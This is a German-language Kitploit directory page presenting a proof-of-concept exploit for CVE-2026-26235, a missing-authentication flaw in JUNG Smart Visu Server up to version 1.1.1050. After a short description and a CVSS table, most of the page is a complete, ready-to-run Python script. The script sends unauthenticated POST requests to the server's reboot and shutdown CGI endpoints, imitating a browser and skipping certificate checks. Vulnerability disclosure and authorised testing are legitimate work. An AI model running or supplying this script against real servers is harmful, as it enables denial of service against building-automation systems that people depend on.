Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-26235-JUNG-Smart-Visu-Server-Unauthenticated-Reboot-Shutdown — Proof-of-Concept-Exploit für CVE-2026-26235, eine nicht authentifizierte Denial-of-Service-Schwachstelle im JUNG Smart Visu Server <=1.1.1050, die einen Remote-Neustart oder ein Herunterfahren über exponierte CGI-Endpunkte ermöglicht. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2026-26235-jung-smart-visu-server-unauthenticated-reboot-shutdown
IoT-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubmbanyamer/cve-2026-26235-jung-smart-visu-server-unauthenticated-reboot-shutdown

CVE-2026-26235-JUNG-Smart-Visu-Server-Unauthenticated-Reboot-Shutdown

Proof-of-Concept-Exploit für CVE-2026-26235, eine nicht authentifizierte Denial-of-Service-Schwachstelle im JUNG Smart Visu Server <=1.1.1050, die einen Remote-Neustart oder ein Herunterfahren über exponierte CGI-Endpunkte ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
22vor 7 MonatenNoch nicht geprüft

👤 Autor

Mohammed Idrees Banyamer

  • 📍 Land: Jordanien
  • 📸 Instagram: @banyamer_security

Python Version CVE CVSS CWE Author

Proof-of-Concept-Exploit für CVE-2026-26235 – Nicht authentifizierter Denial of Service durch fehlende Authentifizierung im JUNG Smart Visu Server ≤ 1.1.1050.


🚨 Beschreibung der Schwachstelle

CVE-2026-26235 ist eine nicht authentifizierte Denial-of-Service-Schwachstelle im JUNG Smart Visu Server in Versionen ≤ 1.1.1050. Das Produkt implementiert keine Authentifizierung für kritische Systemverwaltungsfunktionen, sodass entfernte Angreifer den Server mit einer einzigen POST-Anfrage neu starten oder herunterfahren können.

Die Endpunkte /cgi-bin/reboot.sh und /cgi-bin/shutdown.sh sind ohne jegliche Authentifizierungsprüfungen exponiert. Für die Auslösung dieser Systembefehle sind keine Sitzungstokens, API-Schlüssel oder Anmeldedaten erforderlich.

Dies ermöglicht:

  • Nicht authentifizierter Systemneustart/-herunterfahren
  • Keine Benutzerinteraktion erforderlich
  • Vollständige Unterbrechung des Dienstes
  • Anhaltender Denial of Service

🎯 Betroffene Versionen

StatusVersion
❌ VerwundbarJUNG Smart Visu Server ≤ 1.1.1050
✅ BehobenNoch nicht veröffentlicht

Getestet auf: JUNG Smart Visu Server 1.1.1050, Embedded Linux


💥 Auswirkungen

VektorBeschreibung
CVSS v48.7 (Hoch) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
AuthentifizierungKeine – Vollständig ohne Authentifizierung
AngriffsvektorNetzwerk
KomplexitätNiedrig
AuswirkungHohe Auswirkung auf die Verfügbarkeit

🔬 Technische Details

Grundursache

  1. Fehlende Authentifizierung – CWE-306: Das Produkt führt keine Authentifizierung für kritische Systemfunktionen durch
  2. Exponierte CGI-Endpunkte – /cgi-bin/reboot.sh und /cgi-bin/shutdown.sh sind öffentlich zugänglich
  3. Keine Sitzungsvalidierung – Es findet keine Überprüfung von Cookies, Tokens oder Anmeldedaten statt
  4. Direkte Ausführung von Systembefehlen – CGI-Skripte führen System-Neustart-/Herunterfahrbefehle ohne Berechtigungsprüfungen aus

Ablauf der Schwachstelle

Angreifer → POST /cgi-bin/reboot.sh → Keine Authentifizierungsprüfung → Systemneustart → DoS
Angreifer → POST /cgi-bin/shutdown.sh → Keine Authentifizierungsprüfung → Systemherunterfahren → DoS

🛠️ Proof of Concept

Python-Exploit-Skript

#!/usr/bin/env python3
# Exploit Title: JUNG Smart Visu Server - Unauthenticated Remote Reboot/Shutdown
# CVE: CVE-2026-26235
# Date: 2026-02-12
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/banyamer-security
# Vendor Homepage: https://www.jung.de
# Software Link: https://www.jung.de/smart-visu-server
# Vulnerable: JUNG Smart Visu Server <= 1.1.1050
# Tested on: JUNG Smart Visu Server 1.1.1050
# Category: Web Application
# Platform: Embedded/Linux
# Exploit Type: Missing Authentication (CWE-306)

import requests
import sys
import argparse
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def print_banner():
    print("\n" + "="*60)
    print(" JUNG Smart Visu Server - Unauthenticated Reboot/Shutdown PoC")
    print(" CVE-2026-26235 | CWE-306")
    print("="*60 + "\n")

def exploit(target, action="reboot", verify_ssl=False, timeout=10):
    endpoints = {
        "reboot": "/cgi-bin/reboot.sh",
        "shutdown": "/cgi-bin/shutdown.sh"
    }
    
    if action not in endpoints:
        print(f"[-] Invalid action: {action}. Choose 'reboot' or 'shutdown'.")
        return False
    
    url = f"{target.rstrip('/')}{endpoints[action]}"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1",
        "Cache-Control": "max-age=0",
        "Origin": target.rstrip('/'),
        "Referer": f"{target.rstrip('/')}/",
        "DNT": "1",
        "Sec-GPC": "1"
    }
    
    print(f"[*] Target      : {url}")
    print(f"[*] Action      : {action.upper()}")
    print(f"[*] SSL Verify  : {verify_ssl}")
    print("[*] Sending unauthenticated POST request...\n")
    
    try:
        response = requests.post(
            url, 
            headers=headers,
            data="",  
            verify=verify_ssl,
            timeout=timeout,
            allow_redirects=False
        )
        
        print(f"[+] Request sent successfully!")
        print(f"[+] HTTP Status : {response.status_code}")
        
        if response.status_code == 200:
            print("[!] Server responded with 200 OK - action likely executed")
        elif response.status_code == 302 or response.status_code == 301:
            print("[!] Server responded with redirect - action may have been triggered")
        else:
            print(f"[?] Unexpected response code: {response.status_code}")
        
        if response.text:
            print(f"[*] Response preview: {response.text[:200].strip()}")
        
        print("\n[!] If successful, the target server should now be restarting or shutting down.")
        return True
        
    except requests.exceptions.Timeout:
        print("[-] Connection timeout. The server may be down or unreachable.")
        print("[*] This could indicate successful DoS if the server was previously reachable.")
        return True
    except requests.exceptions.ConnectionError as e:
        print(f"[-] Connection error: {e}")
        print("[*] The server may have gone down - possibly successful exploitation.")
        return True
    except Exception as e:
        print(f"[-] An error occurred: {e}")
        return False

def main():
    print_banner()
    
    parser = argparse.ArgumentParser(
        description="PoC for CVE-2026-26235 - JUNG Smart Visu Server Unauthenticated Reboot/Shutdown"
    )
    parser.add_argument(
        "target",
        help="Target server URL (e.g., https://192.168.1.100:8080)"
    )
    parser.add_argument(
        "-a", "--action",
        choices=["reboot", "shutdown"],
        default="reboot",
        help="Action to perform: reboot or shutdown (default: reboot)"
    )
    parser.add_argument(
        "-k", "--insecure",
        action="store_false",
        dest="verify_ssl",
        default=False,
        help="Disable SSL certificate verification (default: disabled)"
    )
    parser.add_argument(
        "-t", "--timeout",
        type=int,
        default=10,
        help="Request timeout in seconds (default: 10)"
    )
    
    args = parser.parse_args()
    
    print(f"[*] Starting exploit against: {args.target}\n")
    
    success = exploit(
        target=args.target,
        action=args.action,
        verify_ssl=args.verify_ssl,
        timeout=args.timeout
    )
    
    if success:
        print("\n[+] Exploit completed successfully.")
    else:
        print("\n[-] Exploit failed.")
        sys.exit(1)
Tool herunterladen